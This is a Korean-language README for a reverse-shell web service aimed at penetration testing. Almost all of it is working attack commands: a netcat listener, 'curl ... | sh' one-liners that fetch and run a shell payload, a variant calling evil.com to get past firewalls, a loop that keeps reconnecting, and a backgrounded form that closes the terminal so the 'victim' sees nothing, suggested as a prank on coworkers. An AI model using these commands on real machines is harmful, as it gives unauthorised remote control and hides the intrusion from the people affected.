
침투 테스트 중에 대상 환경을 자동으로 감지하고 원격 액세스를 위한 적절한 페이로드를 실행하는 주문형 역방향 셸 서비스입니다.
리버스 셸 서비스 - https://reverse-shell.sh
기억하기 쉬운 리버스 셸로, 대부분의 유닉스 계열 시스템에서 작동합니다.
대상에서 사용 가능한 소프트웨어를 감지하고 적절한 페이로드를 실행합니다.
자신의 머신에서 포트를 열고 대기합니다. netcat으로 쉽게 할 수 있습니다.
nc -l 1337
대상 머신에서 https://reverse-shell.sh/yourip:port의 출력을 sh로 파이프합니다.
curl https://reverse-shell.sh/192.168.0.69:1337 | sh
자신의 머신으로 돌아가면 셸 프롬프트가 나타납니다.
이 도구는 침투 테스트나 동료가 왜 항상 컴퓨터를 잠가야 하는지 이해시키기 위한 것입니다. 악의적인 목적으로 사용하지 마세요.
IP 대신 호스트 이름을 사용할 수 있습니다.
curl https://reverse-shell.sh/localhost:1337 | sh
이것은 역방향 연결이므로 방화벽을 통과하여 인터넷에 연결할 수 있습니다.
evil.com 서버에서 연결을 대기하고 보안 네트워크 내부에서 리버스 셸을 얻을 수 있습니다:
curl https://reverse-shell.sh/evil.com:1337 | sh
기본적으로 셸이 종료되면 연결이 끊깁니다. 잘못된 명령으로 실수로 이렇게 될 수 있습니다. while 루프로 감싸서 재연결을 시도하는 셸을 쉽게 만들 수 있습니다.
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
동료에게 이렇게 할 경우 주의하세요. 만약 그들이 사무실을 떠날 때 이게 여전히 실행 중이라면 공격에 노출시키게 됩니다.
리버스 셸 연결을 유지하려면 터미널 세션이 열려 있어야 합니다. 동료를 장난치려 할 때는 다소 눈에 띌 수 있습니다.
다음 명령은 리버스 셸을 백그라운드 프로세스로 실행하고 터미널을 종료하여 피해자의 머신에 의심스러운 터미널 창을 남기지 않습니다.
새 터미널 창에서 실행해야 합니다. 그렇지 않으면 기존 세션의 작업이 손실됩니다.
sh -c "curl https://reverse-shell.sh/localhost:1337 | sh -i &" && exit
MIT © Luke Childs